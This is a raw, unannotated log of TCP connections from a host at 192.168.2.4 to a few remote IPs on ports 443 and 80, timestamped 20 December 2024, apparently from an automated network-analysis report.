                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.242866993 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.243063927 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.243098021 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.391433001 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.511367083 CET8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.511671066 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.942867994 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.943078995 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.943130016 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.943782091 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.944148064 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.944261074 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.944288969 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.944936991 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.945126057 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.945135117 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.945768118 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.946031094 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.946114063 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.946140051 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.946825027 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.947006941 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.947060108 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.948215008 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.948519945 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.948628902 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.948705912 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.986087084 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.986254930 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.986277103 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.987334013 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.987338066 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.987960100 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.988023996 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.988329887 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.988480091 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.988487005 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.988503933 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.989208937 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.989381075 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.989406109 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990030050 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990128040 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990130901 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990180016 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990756989 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990869045 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.990919113 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996169090 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996373892 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996387959 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996390104 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996397972 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996403933 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996581078 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996587992 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996675968 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996685028 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996762991 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996769905 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.996970892 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.997136116 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.997148991 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998126030 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998191118 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998498917 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998541117 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998564005 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998575926 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998605013 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998620033 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998653889 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998712063 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998812914 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.998876095 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999200106 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999294996 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999484062 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999567032 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999814987 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.999898911 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000140905 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000233889 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000479937 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000487089 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000606060 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000622034 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000648022 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000655890 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000718117 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000725031 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000762939 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.000788927 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.040762901 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.040762901 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.040811062 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.040812016 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.041650057 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.041650057 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.041666985 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.041708946 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.088664055 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.218462944 CET44349804141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.218653917 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.218681097 CET44349804141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.219553947 CET44349804141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.219615936 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.219891071 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.219965935 CET44349804141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.220074892 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.223300934 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.223484039 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.223494053 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.226640940 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.226700068 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.226990938 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.227067947 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.227091074 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.262065887 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.262074947 CET44349804141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.267345905 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.277863026 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.277875900 CET44349805141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.309354067 CET49804443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.321031094 CET49805443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391043901 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391191006 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391252995 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391297102 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391405106 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391491890 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391511917 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391665936 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391721964 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391921997 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.391966105 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392004967 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392025948 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392035961 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392062902 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392093897 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392148972 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392369986 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392437935 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392489910 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392523050 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392530918 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392540932 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392580986 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392589092 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392596960 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392647028 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.392654896 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.394157887 CET49795443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.394185066 CET44349795141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.398121119 CET49796443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.398139954 CET44349796141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.398468971 CET49808443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.398509026 CET44349808141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.398616076 CET49808443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.399215937 CET49808443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.399230957 CET44349808141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.400717020 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.400774956 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.400784016 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.409106970 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.409187078 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.409193039 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.424781084 CET49809443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.424807072 CET44349809141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.424877882 CET49809443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.425261021 CET49809443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.425273895 CET44349809141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.431878090 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.431930065 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.431986094 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.432014942 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.432039976 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.432091951 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.433609009 CET49799443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.433651924 CET44349799141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.433974028 CET49810443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.433995962 CET44349810141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.434055090 CET49810443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.434813023 CET49810443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.434828043 CET44349810141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436126947 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436191082 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436227083 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436269045 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436296940 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436306000 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436317921 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436346054 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436393023 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436417103 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436423063 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436475992 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436480999 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436517000 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.436562061 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.437693119 CET49800443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.437700033 CET44349800141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.439837933 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.439915895 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.439965963 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.440875053 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.440999031 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.441071987 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.441095114 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.441308022 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.441530943 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.442502975 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.442610979 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.442656040 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443166971 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443231106 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443273067 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443295002 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443304062 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443346977 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443353891 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443418026 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443474054 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.443890095 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.444123983 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.444183111 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.451294899 CET49801443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.451328993 CET44349801141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.453012943 CET49797443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.453039885 CET44349797141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.453335047 CET49811443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.453356028 CET44349811141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.453452110 CET49811443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.455070019 CET49811443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.455082893 CET44349811141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.455455065 CET49802443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.455471039 CET44349802141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.456907034 CET49798443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.456918955 CET44349798141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.457317114 CET49812443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.457339048 CET44349812141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.457397938 CET49812443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.459917068 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.460223913 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.460833073 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.460899115 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.460922003 CET49812443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.460952044 CET44349812141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.461520910 CET49803443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.461549044 CET44349803141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.464512110 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.464605093 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.465369940 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.465519905 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.465555906 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.507040024 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.507060051 CET44349806172.67.69.73192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.512015104 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.553260088 CET49806443192.168.2.4172.67.69.73
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.553504944 CET49794443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.585649014 CET44349794141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:50.589159966 CET44349794141.193.213.10192.168.2.4
